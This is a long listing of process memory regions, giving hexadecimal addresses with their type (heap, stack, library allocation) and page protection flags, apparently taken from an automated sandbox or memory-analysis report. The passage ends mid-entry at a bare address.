24ABAA66000
heap
page read and write
2F80000
stack
page read and write
7FF5D7705000
unkown
page readonly
3074000
heap
page read and write
2B44000
heap
page read and write
24ABAB0B000
heap
page read and write
24ABAB53000
heap
page read and write
5FDC000
stack
page read and write
20E76596000
heap
page read and write
5AF8000
heap
page read and write
2B44000
heap
page read and write
4DE000
stack
page read and write
5121000
heap
page read and write
24ABA7F5000
heap
page read and write
24ABAAC3000
heap
page read and write
4CE1000
heap
page read and write
8980000
unkown
page read and write
51F0000
heap
page read and write
5681000
heap
page read and write
3FCA000
heap
page read and write
A4471FE000
stack
page read and write
4A28000
trusted library allocation
page read and write
5121000
heap
page read and write
6B3B000
stack
page read and write
3371000
unkown
page read and write
5121000
heap
page read and write
24ABA7E7000
heap
page read and write
ED0000
trusted library allocation
page read and write
22CBCB4B000
heap
page read and write
11C0000
unkown
page read and write
A0A8000
stack
page read and write
5121000
heap
page read and write
5099000
heap
page read and write
1190000
unkown
page read and write
1FF72CF0000
heap
page execute and read and write
682E000
stack
page read and write
24ABAADB000
heap
page read and write
22CBCB5B000
heap
page read and write
1142000
unkown
page read and write
24ABAB13000
heap
page read and write
22CBCB5B000
heap
page read and write
7FF848EC6000
trusted library allocation
page read and write
24ABAADB000
heap
page read and write
50C6000
heap
page read and write
11D0000
unkown
page read and write
24ABAB13000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
33AC000
heap
page read and write
5A41000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCB7B000
heap
page read and write
1100000
unkown
page read and write
8B70000
unkown
page read and write
24ABAB23000
heap
page read and write
114A000
unkown
page read and write
5AF8000
heap
page read and write
33AC000
heap
page read and write
4DEA000
heap
page read and write
22CBCB5B000
heap
page read and write
2B44000
heap
page read and write
5E59000
heap
page read and write
22CBCB33000
heap
page read and write
2900000
heap
page read and write
730D000
stack
page read and write
2B44000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABA88F000
heap
page read and write
5121000
heap
page read and write
4F10000
trusted library allocation
page read and write
335E000
stack
page read and write
22CBCB5B000
heap
page read and write
24ABAAC3000
heap
page read and write
8B70000
unkown
page read and write
1190000
unkown
page read and write
B2A000
heap
page read and write
5121000
heap
page read and write
5E59000
heap
page read and write
22CBCB5B000
heap
page read and write
7FF5D768B000
unkown
page readonly
22CBCB4B000
heap
page read and write
11A0000
unkown
page read and write
5681000
heap
page read and write
24ABAACB000
heap
page read and write
91D8000
trusted library allocation
page read and write
5AF8000
heap
page read and write
24ABAAFB000
heap
page read and write
24ABAA7C000
heap
page read and write
24ABAAC3000
heap
page read and write
4219000
trusted library allocation
page read and write
4CE1000
heap
page read and write
24ABAAF3000
heap
page read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
7DF488BE0000
unkown
page read and write
24ABAB3C000
heap
page read and write
5F0000
unkown
page readonly
59BE000
unkown
page read and write
24ABA897000
heap
page read and write
24ABA7E9000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
24ABAA89000
heap
page read and write
4F10000
trusted library allocation
page read and write
24ABAACB000
heap
page read and write
1F50000
heap
page read and write
2EC0000
unkown
page readonly
7FF848F30000
trusted library allocation
page execute and read and write
7FF848FB0000
trusted library allocation
page read and write
556B000
heap
page read and write
CD5000
heap
page read and write
24ABAAC3000
heap
page read and write
5AF8000
heap
page read and write
50C6000
heap
page read and write
3CA0000
unkown
page read and write
5AF8000
heap
page read and write
400000
unkown
page readonly
5681000
heap
page read and write
4F10000
trusted library allocation
page read and write
1FF711D0000
heap
page read and write
22CBCBBB000
heap
page read and write
7FF5D77DD000
unkown
page readonly
24ABA7C6000
heap
page read and write
ED0000
trusted library allocation
page read and write
4EA0000
heap
page read and write
22CBCB4B000
heap
page read and write
1100000
unkown
page read and write
24ABA7C6000
heap
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
718B000
stack
page read and write
5121000
heap
page read and write
24ABAAFB000
heap
page read and write
24ABAA60000
heap
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
22CBCB63000
heap
page read and write
77C0000
trusted library allocation
page read and write
A384000
unkown
page read and write
35BD000
heap
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
1230000
trusted library allocation
page read and write
5681000
heap
page read and write
2D50000
heap
page read and write
787C000
stack
page read and write
22CBCBA3000
heap
page read and write
22CBC6F4000
heap
page read and write
5681000
heap
page read and write
408000
unkown
page readonly
5AF8000
heap
page read and write
3510000
trusted library allocation
page read and write
5121000
heap
page read and write
35D3000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
1190000
unkown
page read and write
70B0000
trusted library allocation
page read and write
5121000
heap
page read and write
15F0000
heap
page read and write
5AF8000
heap
page read and write
34BE000
stack
page read and write
8B70000
unkown
page read and write
6E3A000
heap
page read and write
5602000
heap
page read and write
5121000
heap
page read and write
24ABA884000
heap
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
4E90000
direct allocation
page execute and read and write
11C0000
unkown
page read and write
24ABAAE3000
heap
page read and write
3500000
heap
page read and write
AA0000
trusted library allocation
page read and write
55F5000
heap
page read and write
24ABAAF3000
heap
page read and write
22CBCB4B000
heap
page read and write
1FF72C30000
heap
page read and write
4CE1000
heap
page read and write
33AC000
heap
page read and write
24ABAACB000
heap
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
24ABAA66000
heap
page read and write
8B70000
unkown
page read and write
22CBCB43000
heap
page read and write
2B44000
heap
page read and write
8B70000
unkown
page read and write
6FCE000
stack
page read and write
1230000
trusted library allocation
page read and write
5681000
heap
page read and write
24ABAB23000
heap
page read and write
11C0000
unkown
page read and write
2B44000
heap
page read and write
1190000
unkown
page read and write
22CBCB4B000
heap
page read and write
4E2D000
stack
page read and write
1190000
unkown
page read and write
3052000
trusted library allocation
page read and write
24ABA7E9000
heap
page read and write
25C0000
trusted library allocation
page read and write
22CBCB8B000
heap
page read and write
33AC000
heap
page read and write
11C0000
unkown
page read and write
AA0000
trusted library allocation
page read and write
5E7C000
heap
page read and write
68EE000
stack
page read and write
22CBCBA3000
heap
page read and write
8980000
unkown
page read and write
24ABAACB000
heap
page read and write
4D70000
trusted library allocation
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
24ABAB13000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
376E000
stack
page read and write
C73E000
unkown
page read and write
1190000
unkown
page read and write
7FF5D75FF000
unkown
page readonly
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
2B44000
heap
page read and write
5C44000
heap
page read and write
5121000
heap
page read and write
33AC000
heap
page read and write
AA0000
trusted library allocation
page read and write
24ABAA91000
heap
page read and write
24ABAA5B000
heap
page read and write
24ABAADB000
heap
page read and write
22CBCB8B000
heap
page read and write
2B44000
heap
page read and write
2B44000
heap
page read and write
674000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAAE3000
heap
page read and write
3A00000
heap
page read and write
7800000
trusted library allocation
page read and write
70F0000
trusted library allocation
page read and write
2660000
heap
page read and write
24ABAAAB000
heap
page read and write
22CBCB63000
heap
page read and write
2F5E000
stack
page read and write
22CBC679000
heap
page read and write
24ABAB3B000
heap
page read and write
1190000
unkown
page read and write
24ABAAC1000
heap
page read and write
22CBCBBB000
heap
page read and write
24ABA7BB000
heap
page read and write
5E59000
heap
page read and write
91E2000
trusted library allocation
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
4F10000
trusted library allocation
page read and write
1110000
unkown
page read and write
5680000
unkown
page read and write
5121000
heap
page read and write
5A85000
heap
page read and write
31F0000
heap
page read and write
2140000
heap
page read and write
24ABAAE3000
heap
page read and write
9D67000
unkown
page read and write
489000
unkown
page readonly
B330000
unkown
page read and write
5712000
unkown
page read and write
8980000
unkown
page read and write
22CBCB7B000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
7FF5D743F000
unkown
page readonly
22CBCB5B000
heap
page read and write
5681000
heap
page read and write
24ABAADB000
heap
page read and write
3000000
unkown
page read and write
C80000
heap
page read and write
19E000
stack
page read and write
24ABAAF3000
heap
page read and write
22CBCB63000
heap
page read and write
2D68000
heap
page read and write
22CBC679000
heap
page read and write
1FF71250000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
24ABAB13000
heap
page read and write
CBB000
heap
page read and write
22CBCB63000
heap
page read and write
22CBCB93000
heap
page read and write
22CBCB7B000
heap
page read and write
8B70000
unkown
page read and write
7AD0000
heap
page read and write
114A000
unkown
page read and write
8F10000
unkown
page read and write
11D0000
unkown
page read and write
5681000
heap
page read and write
24ABAADB000
heap
page read and write
2A50000
trusted library allocation
page read and write
5121000
heap
page read and write
7FF5D76E8000
unkown
page readonly
5121000
heap
page read and write
1EE000
stack
page read and write
22CBCB73000
heap
page read and write
2B44000
heap
page read and write
22CBCB73000
heap
page read and write
22CBCBAB000
heap
page read and write
1170000
unkown
page read and write
5121000
heap
page read and write
51C0000
heap
page read and write
5410000
heap
page read and write
7460000
unkown
page read and write
41F0000
trusted library allocation
page read and write
24ABAA60000
heap
page read and write
4AD1000
heap
page read and write
7FF5D7589000
unkown
page readonly
11C0000
unkown
page read and write
5E97000
heap
page read and write
1731000
unkown
page readonly
5121000
heap
page read and write
674000
heap
page read and write
24ABAB2B000
heap
page read and write
9A72000
unkown
page read and write
1190000
unkown
page read and write
22CBCB73000
heap
page read and write
24ABAA69000
heap
page read and write
8B70000
unkown
page read and write
1270000
unkown
page read and write
57F0000
unkown
page read and write
2070000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
8B70000
unkown
page read and write
50E1000
heap
page read and write
5E59000
heap
page read and write
9820000
unkown
page read and write
8B70000
unkown
page read and write
22CBCBAB000
heap
page read and write
24ABA31C000
heap
page read and write
404000
unkown
page execute and write copy
32E0000
heap
page read and write
5121000
heap
page read and write
24ABA7CF000
heap
page read and write
24ABA884000
heap
page read and write
7AA0000
unkown
page read and write
22CBCB93000
heap
page read and write
3074000
heap
page read and write
20E76510000
heap
page read and write
3510000
trusted library allocation
page read and write
24ABAA60000
heap
page read and write
24ABAAF3000
heap
page read and write
35D0000
heap
page read and write
24ABAAA7000
heap
page read and write
25C0000
trusted library allocation
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
2630000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAB13000
heap
page read and write
22CBC63C000
heap
page read and write
5D5B000
heap
page read and write
401000
unkown
page execute read
69FE000
stack
page read and write
11C0000
unkown
page read and write
7070000
trusted library allocation
page read and write
5E59000
heap
page read and write
4580000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
24ABAAFF000
heap
page read and write
7FF5D747F000
unkown
page readonly
6AFE000
stack
page read and write
8A46000
unkown
page read and write
22CBCB63000
heap
page read and write
7FF5D764F000
unkown
page readonly
5121000
heap
page read and write
4820000
trusted library allocation
page read and write
3E3E000
unkown
page read and write
22CBCB5B000
heap
page read and write
4CE1000
heap
page read and write
24ABAA85000
heap
page read and write
24ABAACB000
heap
page read and write
11A0000
unkown
page read and write
D06000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCB93000
heap
page read and write
2B44000
heap
page read and write
5AF8000
heap
page read and write
1150000
unkown
page read and write
5121000
heap
page read and write
7FF5D71D7000
unkown
page readonly
3457000
heap
page read and write
7FF5D7398000
unkown
page readonly
A12F000
stack
page read and write
5121000
heap
page read and write
5E7C000
heap
page read and write
24ABAAC3000
heap
page read and write
11C0000
unkown
page read and write
2B44000
heap
page read and write
7DF488BE1000
unkown
page execute read
610000
heap
page read and write
5121000
heap
page read and write
8F10000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
BB0D000
stack
page read and write
8F10000
unkown
page read and write
24ABAACB000
heap
page read and write
8F10000
unkown
page read and write
7FF848E30000
trusted library allocation
page read and write
22CBCB63000
heap
page read and write
3074000
heap
page read and write
3630000
unkown
page readonly
24ABAAED000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
22CBCB7B000
heap
page read and write
AD0000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAAFB000
heap
page read and write
20E765A0000
heap
page read and write
24ABAAAB000
heap
page read and write
1FF710A0000
heap
page read and write
24ABAAFB000
heap
page read and write
32E5000
heap
page read and write
5121000
heap
page read and write
24ABAB0B000
heap
page read and write
22CBCB8B000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
3000000
unkown
page read and write
11C0000
unkown
page read and write
2B44000
heap
page read and write
2A50000
trusted library allocation
page read and write
3310000
heap
page read and write
22CBCBDB000
heap
page read and write
22CBCBA3000
heap
page read and write
2D30000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAAC3000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB93000
heap
page read and write
2B44000
heap
page read and write
5681000
heap
page read and write
34FE000
stack
page read and write
24ABAA6C000
heap
page read and write
32D1000
heap
page read and write
24ABAAE3000
heap
page read and write
2B44000
heap
page read and write
9820000
unkown
page read and write
6ABA000
stack
page read and write
24ABA7E1000
heap
page read and write
10EDF000
unkown
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABAAC3000
heap
page read and write
8B70000
unkown
page read and write
A82000
heap
page read and write
24ABA884000
heap
page read and write
5121000
heap
page read and write
24ABA324000
heap
page read and write
35C0000
heap
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
5121000
heap
page read and write
4F10000
trusted library allocation
page read and write
5560000
heap
page read and write
12D0000
unkown
page readonly
22CBCB63000
heap
page read and write
5681000
heap
page read and write
8B70000
unkown
page read and write
7820000
trusted library allocation
page read and write
24ABAAFE000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
91F1000
trusted library allocation
page read and write
5121000
heap
page read and write
22CBCB73000
heap
page read and write
1190000
unkown
page read and write
24ABAAC3000
heap
page read and write
1190000
unkown
page read and write
22CBCB63000
heap
page read and write
24ABAA71000
heap
page read and write
22CBCB4B000
heap
page read and write
22CBCB43000
heap
page read and write
5AF8000
heap
page read and write
4658000
trusted library allocation
page read and write
8F10000
unkown
page read and write
11D0000
unkown
page read and write
5121000
heap
page read and write
22CBCBBB000
heap
page read and write
1100000
unkown
page read and write
8B70000
unkown
page read and write
24ABAADB000
heap
page read and write
2B44000
heap
page read and write
50A7000
heap
page read and write
7FF848E14000
trusted library allocation
page read and write
20E764F0000
heap
page read and write
301E000
stack
page read and write
9206000
trusted library allocation
page read and write
24ABAADB000
heap
page read and write
8B70000
unkown
page read and write
7FF5D72DF000
unkown
page readonly
9208000
trusted library allocation
page read and write
10E80000
unkown
page read and write
5E59000
heap
page read and write
2B44000
heap
page read and write
24ABAACB000
heap
page read and write
5121000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAA3B000
heap
page read and write
424A000
heap
page read and write
8B70000
unkown
page read and write
24ABAAED000
heap
page read and write
2B44000
heap
page read and write
24ABAB3C000
heap
page read and write
24ABAA6C000
heap
page read and write
7FF5D720F000
unkown
page readonly
84F000
stack
page read and write
2B44000
heap
page read and write
24ABA324000
heap
page read and write
20E76596000
heap
page read and write
24ABAAFB000
heap
page read and write
35F7000
heap
page read and write
7FF5D73F5000
unkown
page readonly
11C0000
unkown
page read and write
2B44000
heap
page read and write
33AC000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAAF3000
heap
page read and write
5121000
heap
page read and write
20E765BA000
heap
page read and write
11D0000
unkown
page read and write
25C0000
trusted library allocation
page read and write
7020000
trusted library allocation
page execute and read and write
25EE000
stack
page read and write
22CBCB5B000
heap
page read and write
3000000
unkown
page read and write
5121000
heap
page read and write
303E000
stack
page read and write
5121000
heap
page read and write
24ABAAF3000
heap
page read and write
1100000
unkown
page read and write
3277000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB43000
heap
page read and write
310F000
stack
page read and write
24ABAADB000
heap
page read and write
11C0000
unkown
page read and write
9EB0000
unkown
page readonly
5121000
heap
page read and write
22CBC679000
heap
page read and write
2F1B000
heap
page read and write
321D000
stack
page read and write
8280000
trusted library allocation
page execute and read and write
22CBCB63000
heap
page read and write
6A7D000
stack
page read and write
8B70000
unkown
page read and write
30BE000
stack
page read and write
5681000
heap
page read and write
22CBCB73000
heap
page read and write
35D1000
heap
page read and write
24ABAA8E000
heap
page read and write
2B44000
heap
page read and write
1DE000
stack
page read and write
28FF000
stack
page read and write
9C000
stack
page read and write
5210000
direct allocation
page read and write
4790000
heap
page execute and read and write
33AC000
heap
page read and write
1190000
unkown
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
ED0000
trusted library allocation
page read and write
22CBCB73000
heap
page read and write
8B70000
unkown
page read and write
35B7000
heap
page read and write
24ABAACB000
heap
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
4230000
heap
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
22CBCB73000
heap
page read and write
22CBCB4B000
heap
page read and write
5121000
heap
page read and write
5E73000
heap
page read and write
3000000
unkown
page read and write
AA0000
trusted library allocation
page read and write
22CBCB5B000
heap
page read and write
1170000
unkown
page read and write
24ABAADB000
heap
page read and write
24ABAAF3000
heap
page read and write
7FF5D7284000
unkown
page readonly
A2D7000
unkown
page read and write
1100000
unkown
page read and write
1110000
unkown
page read and write
5121000
heap
page read and write
31C5000
heap
page read and write
24ABA866000
heap
page read and write
22CBCB5B000
heap
page read and write
24ABAAB4000
heap
page read and write
670000
heap
page read and write
22CBCB43000
heap
page read and write
1190000
unkown
page read and write
24ABAA64000
heap
page read and write
7FF5D76F5000
unkown
page readonly
22CBCB5B000
heap
page read and write
2B45000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAAC3000
heap
page read and write
22CBCB4B000
heap
page read and write
24ABAB13000
heap
page read and write
24ABAA64000
heap
page read and write
8B70000
unkown
page read and write
3590000
heap
page read and write
5AF8000
heap
page read and write
7FF5D72D3000
unkown
page readonly
7FF5D705D000
unkown
page readonly
A251000
unkown
page read and write
22CBCB93000
heap
page read and write
24ABA7CC000
heap
page read and write
22CBCB93000
heap
page read and write
22CBCB4B000
heap
page read and write
24ABAAE3000
heap
page read and write
7FF5D77D2000
unkown
page readonly
A408000
unkown
page read and write
5AF8000
heap
page read and write
1210000
unkown
page read and write
2B44000
heap
page read and write
5AF8000
heap
page read and write
C642000
unkown
page read and write
114A000
unkown
page read and write
24ABAACB000
heap
page read and write
C9EB000
unkown
page read and write
33AC000
heap
page read and write
24ABAAF3000
heap
page read and write
5AF8000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
22CBCB4B000
heap
page read and write
22CBCB43000
heap
page read and write
24ABA886000
heap
page read and write
7500000
heap
page read and write
24ABAAF3000
heap
page read and write
1100000
unkown
page read and write
8B70000
unkown
page read and write
33AC000
heap
page read and write
5681000
heap
page read and write
22CBCB7B000
heap
page read and write
24ABAADB000
heap
page read and write
7780000
trusted library allocation
page read and write
24ABA89C000
heap
page read and write
24ABAAED000
heap
page read and write
5121000
heap
page read and write
1FF7127F000
heap
page read and write
35CE000
heap
page read and write
33AC000
heap
page read and write
11C0000
unkown
page read and write
24ABAAFB000
heap
page read and write
22CBCBAB000
heap
page read and write
24ABA7FE000
heap
page read and write
7B10000
unkown
page read and write
5121000
heap
page read and write
35F7000
heap
page read and write
AA0000
trusted library allocation
page read and write
33AC000
heap
page read and write
24ABAAC3000
heap
page read and write
22CBCB93000
heap
page read and write
3000000
unkown
page read and write
1190000
unkown
page read and write
5596000
heap
page read and write
5E59000
heap
page read and write
24ABAA92000
heap
page read and write
AFBE000
stack
page read and write
24ABAAF3000
heap
page read and write
24ABAAC3000
heap
page read and write
9B000
stack
page read and write
22CBCB4B000
heap
page read and write
5121000
heap
page read and write
A3AA000
unkown
page read and write
22CBC319000
heap
page read and write
2ABB000
stack
page read and write
5681000
heap
page read and write
9C000
stack
page read and write
2B44000
heap
page read and write
22CBCB73000
heap
page read and write
22CBCB5B000
heap
page read and write
32C6000
heap
page read and write
24ABAADB000
heap
page read and write
2B44000
heap
page read and write
22CBCB43000
heap
page read and write
2B44000
heap
page read and write
24ABA7FA000
heap
page read and write
7B00000
trusted library allocation
page read and write
24ABAAF3000
heap
page read and write
C9A7000
unkown
page read and write
22CBCB7B000
heap
page read and write
3FC0000
heap
page read and write
5CB000
unkown
page readonly
63D000
heap
page read and write
401000
unkown
page execute read
75F8000
unkown
page read and write
1BC000
stack
page read and write
5AF8000
heap
page read and write
24ABAAC3000
heap
page read and write
5681000
heap
page read and write
22CBCD7A000
heap
page read and write
5121000
heap
page read and write
2E21000
heap
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
5AF8000
heap
page read and write
8B70000
unkown
page read and write
7FF5D738E000
unkown
page readonly
24ABA897000
heap
page read and write
22CBCB73000
heap
page read and write
8F10000
unkown
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
35D8000
heap
page read and write
24ABA882000
heap
page read and write
C70000
heap
page read and write
5121000
heap
page read and write
C621000
unkown
page read and write
3124000
heap
page read and write
32A3000
heap
page read and write
5121000
heap
page read and write
24ABA7A8000
heap
page read and write
4D7B000
heap
page read and write
24ABAA88000
heap
page read and write
24AB87F0000
unkown
page execute and read and write
5121000
heap
page read and write
420D000
trusted library allocation
page execute and read and write
2B44000
heap
page read and write
30D0000
trusted library allocation
page read and write
24ABAA63000
heap
page read and write
5E97000
heap
page read and write
40E0000
heap
page read and write
22CBCB7B000
heap
page read and write
2B44000
heap
page read and write
5AF8000
heap
page read and write
5121000
heap
page read and write
24ABAB0B000
heap
page read and write
22CBCB43000
heap
page read and write
24ABAB0B000
heap
page read and write
4F10000
trusted library allocation
page read and write
5681000
heap
page read and write
1160000
unkown
page read and write
22CBCB63000
heap
page read and write
22CBCB43000
heap
page read and write
2A50000
trusted library allocation
page read and write
644000
unkown
page readonly
24ABACEA000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
2CE5000
heap
page read and write
5121000
heap
page read and write
2D78000
system
page execute and read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAA9B000
heap
page read and write
3120000
unkown
page read and write
22CBCBAB000
heap
page read and write
57F9000
trusted library allocation
page read and write
7FF5D75B3000
unkown
page readonly
22CBCB7B000
heap
page read and write
8B70000
unkown
page read and write
8FC1000
trusted library allocation
page read and write
D22000
heap
page read and write
8B70000
unkown
page read and write
4B21000
heap
page read and write
5580000
heap
page read and write
22CBCB4B000
heap
page read and write
93B0000
stack
page read and write
24ABAA66000
heap
page read and write
22CBCB4B000
heap
page read and write
7FF5D717C000
unkown
page readonly
8B70000
unkown
page read and write
22CBC679000
heap
page read and write
8333000
trusted library allocation
page read and write
5121000
heap
page read and write
7CB0000
unkown
page readonly
24ABAAC3000
heap
page read and write
22CBCBAB000
heap
page read and write
5681000
heap
page read and write
24ABAADB000
heap
page read and write
22CBCB43000
heap
page read and write
33AC000
heap
page read and write
22CBCB8B000
heap
page read and write
24ABABF0000
heap
page read and write
5681000
heap
page read and write
22CBC702000
heap
page read and write
7FF5D7722000
unkown
page readonly
24ABAAC3000
heap
page read and write
24ABA89E000
heap
page read and write
2B44000
heap
page read and write
3370000
heap
page read and write
5121000
heap
page read and write
A446DFD000
stack
page read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAB23000
heap
page read and write
1170000
unkown
page read and write
2B44000
heap
page read and write
1190000
unkown
page read and write
22CBCB4B000
heap
page read and write
D06000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
42C0000
heap
page read and write
5121000
heap
page read and write
3DCD000
unkown
page read and write
5121000
heap
page read and write
ED0000
trusted library allocation
page read and write
7FF5D748C000
unkown
page readonly
2B45000
heap
page read and write
4280000
heap
page read and write
35BD000
unkown
page read and write
32B6000
heap
page read and write
3410000
unkown
page read and write
4F10000
trusted library allocation
page read and write
1100000
unkown
page read and write
8B70000
unkown
page read and write
11A0000
unkown
page read and write
8B70000
unkown
page read and write
22CBCB4B000
heap
page read and write
8870000
unkown
page readonly
8980000
unkown
page read and write
5121000
heap
page read and write
24ABAAC1000
heap
page read and write
70A0000
trusted library allocation
page read and write
34AF000
stack
page read and write
7562000
heap
page read and write
5AF8000
heap
page read and write
5E59000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAB2B000
heap
page read and write
35BD000
heap
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
8B70000
unkown
page read and write
22CBCBF3000
heap
page read and write
8F10000
unkown
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
7620000
trusted library allocation
page read and write
5E59000
heap
page read and write
24ABAAC3000
heap
page read and write
24ABAADB000
heap
page read and write
7FF5D77F0000
unkown
page readonly
7FF5D76DA000
unkown
page readonly
24ABAAE3000
heap
page read and write
881C000
stack
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
A9FD000
unkown
page read and write
22CBCB63000
heap
page read and write
90F000
stack
page read and write
49E0000
heap
page read and write
5AF8000
heap
page read and write
22CBCB63000
heap
page read and write
22CBCB73000
heap
page read and write
5681000
heap
page read and write
2F80000
unkown
page read and write
22CBCB7B000
heap
page read and write
5121000
heap
page read and write
747F000
stack
page read and write
22CBCB4B000
heap
page read and write
5AF8000
heap
page read and write
9579000
stack
page read and write
2EE0000
heap
page read and write
E10000
unkown
page readonly
8B70000
unkown
page read and write
24ABAAFB000
heap
page read and write
24ABAAFB000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAAE3000
heap
page read and write
1170000
unkown
page read and write
5121000
heap
page read and write
CA19000
unkown
page read and write
7FF5D71BF000
unkown
page readonly
3FB0000
heap
page read and write
2B44000
heap
page read and write
31D0000
direct allocation
page read and write
1190000
unkown
page read and write
11A0000
unkown
page read and write
50A7000
heap
page read and write
24ABAAF3000
heap
page read and write
24ABAAC3000
heap
page read and write
7FF848E13000
trusted library allocation
page execute and read and write
114A000
unkown
page read and write
5681000
heap
page read and write
150000
heap
page read and write
5AF8000
heap
page read and write
11C0000
unkown
page read and write
644000
unkown
page readonly
5121000
heap
page read and write
8B70000
unkown
page read and write
2B44000
heap
page read and write
798A000
stack
page read and write
24ABAACB000
heap
page read and write
3124000
heap
page read and write
4630000
heap
page read and write
CDF000
heap
page read and write
6B7E000
stack
page read and write
22CBCB4B000
heap
page read and write
32B1000
heap
page read and write
11C0000
unkown
page read and write
5681000
heap
page read and write
2A50000
trusted library allocation
page read and write
BB10000
heap
page read and write
77A0000
trusted library allocation
page read and write
3510000
trusted library allocation
page read and write
30D0000
trusted library allocation
page read and write
5614000
heap
page read and write
5681000
heap
page read and write
30FB000
stack
page read and write
1100000
unkown
page read and write
8B70000
unkown
page read and write
5424000
heap
page read and write
22CBCB5B000
heap
page read and write
405000
unkown
page execute and read and write
24ABAA64000
heap
page read and write
24ABAB30000
heap
page read and write
4CE1000
heap
page read and write
4650000
trusted library allocation
page read and write
892E000
stack
page read and write
3C78000
unkown
page read and write
22CBCB7B000
heap
page read and write
5AF8000
heap
page read and write
32CB000
heap
page read and write
24ABAB23000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
583E000
stack
page read and write
24ABAAE3000
heap
page read and write
9B41000
unkown
page read and write
7810000
unkown
page read and write
5E95000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABA62D000
heap
page read and write
1FF10008000
trusted library allocation
page read and write
3127000
heap
page read and write
24ABA897000
heap
page read and write
B660000
unkown
page read and write
5E59000
heap
page read and write
24ABA893000
heap
page read and write
A60000
heap
page read and write
22CBCBA3000
heap
page read and write
5121000
heap
page read and write
24ABA7E8000
heap
page read and write
24ABAAF3000
heap
page read and write
24ABAB3B000
heap
page read and write
22CBCBC3000
heap
page read and write
5681000
heap
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABA7DB000
heap
page read and write
94F4000
unkown
page read and write
24ABAA7E000
heap
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
8980000
unkown
page read and write
7FF5D7073000
unkown
page readonly
24ABAA5A000
heap
page read and write
768C000
unkown
page read and write
3000000
unkown
page read and write
22CBCB43000
heap
page read and write
5A61000
heap
page read and write
1170000
unkown
page read and write
79B000
stack
page read and write
5C6000
unkown
page read and write
22CBCBBB000
heap
page read and write
1100000
unkown
page read and write
2B44000
heap
page read and write
2B44000
heap
page read and write
1FF7135D000
heap
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
22CBCB8B000
heap
page read and write
5681000
heap
page read and write
32B3000
heap
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
8B70000
unkown
page read and write
7FF5D7820000
unkown
page readonly
5AF8000
heap
page read and write
24ABAA6C000
heap
page read and write
22CBCB5B000
heap
page read and write
24ABAB0B000
heap
page read and write
2F80000
unkown
page read and write
11A0000
unkown
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
D24000
heap
page read and write
3CDA000
heap
page read and write
5ADE000
stack
page read and write
22CBCB43000
heap
page read and write
24ABAAE3000
heap
page read and write
4B21000
heap
page read and write
7FF5D69BB000
unkown
page readonly
AA0000
trusted library allocation
page read and write
1FF71319000
heap
page read and write
2B44000
heap
page read and write
7FF5D716B000
unkown
page readonly
24ABAAFE000
heap
page read and write
24ABAA8E000
heap
page read and write
24ABA7CD000
heap
page read and write
22CBCB63000
heap
page read and write
20E765BA000
heap
page read and write
1390000
